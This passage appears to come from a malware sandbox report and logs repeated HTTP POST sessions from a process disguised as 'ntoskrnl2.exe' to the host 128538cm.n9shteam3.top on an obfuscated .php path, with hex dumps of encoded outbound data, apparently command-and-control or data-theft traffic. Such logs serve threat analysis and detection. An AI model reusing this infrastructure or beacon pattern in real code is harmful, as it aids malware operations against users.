                                                            Sep 2, 2024 13:33:46.134427071 CEST1028OUTData Raw: 50 51 5f 54 5e 45 59 50 5b 5f 56 5a 57 5a 50 5b 55 5f 5e 48 50 5f 5a 50 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PQ_T^EYP[_VZWZP[U_^HP_ZPYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Y3_+^'01Z%>5<<\;B+'/:<8 Q='="9.:%^./]+
                                                            Sep 2, 2024 13:33:46.455176115 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:46.589682102 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:45 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.64974180.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:46.722269058 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:47.082544088 CEST1028OUTData Raw: 50 52 5a 52 5e 47 5c 56 5b 5f 56 5a 57 5e 50 52 55 51 5e 47 50 52 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PRZR^G\V[_VZW^PRUQ^GPRZ]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'$"-<8830-(/-4 Z0**( )+>"^/*%^./]+$
                                                            Sep 2, 2024 13:33:47.393899918 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:47.526725054 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.64974280.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:47.913032055 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:48.259388924 CEST1028OUTData Raw: 55 55 5a 56 5e 49 59 51 5b 5f 56 5a 57 5f 50 5d 55 5f 5e 42 50 5e 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UUZV^IYQ[_VZW_P]U_^BP^ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'$!*=(,$"%^$]<,;'<9(;8P>$Z):\9%^./]+
                                                            Sep 2, 2024 13:33:48.558787107 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:48.685179949 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:47 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.64974380.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:48.035248041 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:48.391341925 CEST1340OUTData Raw: 55 5e 5a 53 5b 45 5c 53 5b 5f 56 5a 57 5e 50 5a 55 50 5e 42 50 59 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^ZS[E\S[_VZW^PZUP^BPYZ^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'[02-($0Z0=6Y?=\848&,-*(;*$>2=-:%^./]+$
                                                            Sep 2, 2024 13:33:48.699379921 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:48.852103949 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 1e 20 42 2c 08 32 38 2f 07 3d 39 2e 1d 2b 3e 24 45 3a 3c 20 5a 27 3a 3b 5b 28 31 32 08 32 3a 35 58 2b 3f 29 10 28 1c 3e 0c 22 34 20 5b 03 1f 25 5a 37 0c 39 0f 25 06 0f 10 27 34 21 04 22 37 02 5c 29 3e 29 09 33 03 16 59 23 21 31 0c 2c 3d 08 53 27 2b 24 5a 3a 3c 29 04 25 04 2a 56 08 16 38 57 3f 5a 26 14 37 27 2f 58 21 38 00 0d 37 1f 33 51 25 30 3f 56 24 2a 21 1f 33 00 33 50 29 2d 27 14 27 17 39 5f 20 1d 08 0d 39 39 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: B,28/=9.+>$E:< Z':;[(122:5X+?)(>"4 [%Z79%'4!"7\)>)3Y#!1,=S'+$Z:<)%*V8W?Z&7'/X!873Q%0?V$*!33P)-''9_ 99$P.-V0WS
                                                            Sep 2, 2024 13:33:49.070574999 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 1e 20 42 2c 08 32 38 2f 07 3d 39 2e 1d 2b 3e 24 45 3a 3c 20 5a 27 3a 3b 5b 28 31 32 08 32 3a 35 58 2b 3f 29 10 28 1c 3e 0c 22 34 20 5b 03 1f 25 5a 37 0c 39 0f 25 06 0f 10 27 34 21 04 22 37 02 5c 29 3e 29 09 33 03 16 59 23 21 31 0c 2c 3d 08 53 27 2b 24 5a 3a 3c 29 04 25 04 2a 56 08 16 38 57 3f 5a 26 14 37 27 2f 58 21 38 00 0d 37 1f 33 51 25 30 3f 56 24 2a 21 1f 33 00 33 50 29 2d 27 14 27 17 39 5f 20 1d 08 0d 39 39 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: B,28/=9.+>$E:< Z':;[(122:5X+?)(>"4 [%Z79%'4!"7\)>)3Y#!1,=S'+$Z:<)%*V8W?Z&7'/X!873Q%0?V$*!33P)-''9_ 99$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.64974480.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:48.814795017 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:49.165401936 CEST1024OUTData Raw: 55 57 5f 51 5e 49 5c 51 5b 5f 56 5a 57 5d 50 5b 55 58 5e 43 50 58 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UW_Q^I\Q[_VZW]P[UX^CPXZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Z'"%+^?_%"=Y'-:( ,480<%R(('>;?"5-%^./]+,
                                                            Sep 2, 2024 13:33:49.496167898 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:49.630851984 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.64974580.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:50.815675974 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:51.182663918 CEST1024OUTData Raw: 55 51 5f 55 5b 45 5c 51 5b 5f 56 5a 57 5d 50 5e 55 50 5e 48 50 58 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UQ_U[E\Q[_VZW]P^UP^HPXZ]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'_'12?(']'5%>+(Z/7 ]3,9(^;=4=1.%^./]+8
                                                            Sep 2, 2024 13:33:51.458148003 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:51.584599018 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:50 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.64974680.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:51.720474958 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:52.072122097 CEST1028OUTData Raw: 55 57 5f 54 5e 42 5c 54 5b 5f 56 5a 57 5e 50 53 55 5b 5e 45 50 52 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UW_T^B\T[_VZW^PSU[^EPRZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''-X=( 3"$5([7/<]'Z5S*+ U>$$X>&Y/*%^./]+$
                                                            Sep 2, 2024 13:33:52.364274979 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:52.489216089 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:51 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.64975280.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:52.627821922 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:52.978007078 CEST1028OUTData Raw: 50 54 5a 51 5e 44 59 52 5b 5f 56 5a 57 59 50 53 55 5e 5e 49 50 5e 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PTZQ^DYR[_VZWYPSU^^IP^Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'32&+^+0":$=1?-<Z/ ]0<W(?>$8[>!5:*%^./]+8
                                                            Sep 2, 2024 13:33:53.279985905 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:53.458178043 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:52 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.64975380.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:53.614917994 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:53.964237928 CEST1028OUTData Raw: 50 51 5a 57 5e 49 59 52 5b 5f 56 5a 57 59 50 5d 55 5f 5e 47 50 5b 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PQZW^IYR[_VZWYP]U_^GP[Z^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'')=;?_'1X0>X([#;$\0<9U?U>4Y)9:*%^./]+8
                                                            Sep 2, 2024 13:33:54.281526089 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:54.406864882 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.64975580.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:53.860596895 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:54.212327003 CEST1340OUTData Raw: 55 5f 5f 56 5b 45 5c 51 5b 5f 56 5a 57 54 50 59 55 5e 5e 49 50 5e 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U__V[E\Q[_VZWTPYU^^IP^ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'^'!9?8;3%Z$X2+><_8$\'Z9R(;=$^=1"-*%^./]+
                                                            Sep 2, 2024 13:33:54.530071974 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:54.654880047 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 10 37 34 2f 12 31 38 30 5b 3d 39 2a 5e 28 5b 38 0b 3a 3c 30 11 30 2a 3f 1d 3c 31 3d 50 25 39 2e 04 3d 02 3e 05 2b 22 39 1e 22 1e 20 5b 03 1f 25 5c 23 22 2e 1c 25 5e 21 10 24 37 35 06 21 37 24 14 3d 2d 31 08 30 3e 20 11 21 22 3d 0d 2d 2d 2e 1a 25 16 0a 5b 2d 2c 2e 5d 25 2e 2a 56 08 16 38 55 3f 05 39 07 23 19 2c 00 23 01 35 1e 21 26 09 51 25 33 2c 0f 27 04 03 11 24 07 27 55 3d 2e 2b 1b 26 2a 3a 07 23 0a 3e 09 2d 29 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: 74/180[=9*^([8:<00*?<1=P%9.=>+"9" [%\#".%^!$75!7$=-10> !"=--.%[-,.]%.*V8U?9#,#5!&Q%3,'$'U=.+&*:#>-)$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.64975880.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:54.568694115 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:54.915951967 CEST1028OUTData Raw: 55 5e 5a 57 5e 49 59 52 5b 5f 56 5a 57 55 50 5b 55 51 5e 40 50 5e 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^ZW^IYR[_VZWUP[UQ^@P^ZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3)<_0"9_'=9<-/$,9?+ T=40^*=.*%^./]+
                                                            Sep 2, 2024 13:33:55.216475964 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:55.345035076 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:54 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.64975980.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:55.473639011 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:55.822818995 CEST1028OUTData Raw: 50 55 5a 51 5e 40 59 52 5b 5f 56 5a 57 5a 50 53 55 50 5e 48 50 5c 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PUZQ^@YR[_VZWZPSUP^HP\Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3!-(;($5Y%>2X(7;8'Z=R<(*;)2%/*%^./]+
                                                            Sep 2, 2024 13:33:56.127371073 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:56.255502939 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:55 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.64976080.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:56.417265892 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:56.784929991 CEST1028OUTData Raw: 55 56 5a 50 5e 48 59 53 5b 5f 56 5a 57 5b 50 52 55 59 5e 48 50 52 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UVZP^HYS[_VZW[PRUY^HPRZ_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3!?;73%['-9<[#8'$\&<)V<'*(="5.:%^./]+0
                                                            Sep 2, 2024 13:33:57.072036028 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:57.196912050 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:33:57.410520077 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.64976180.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:57.883791924 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
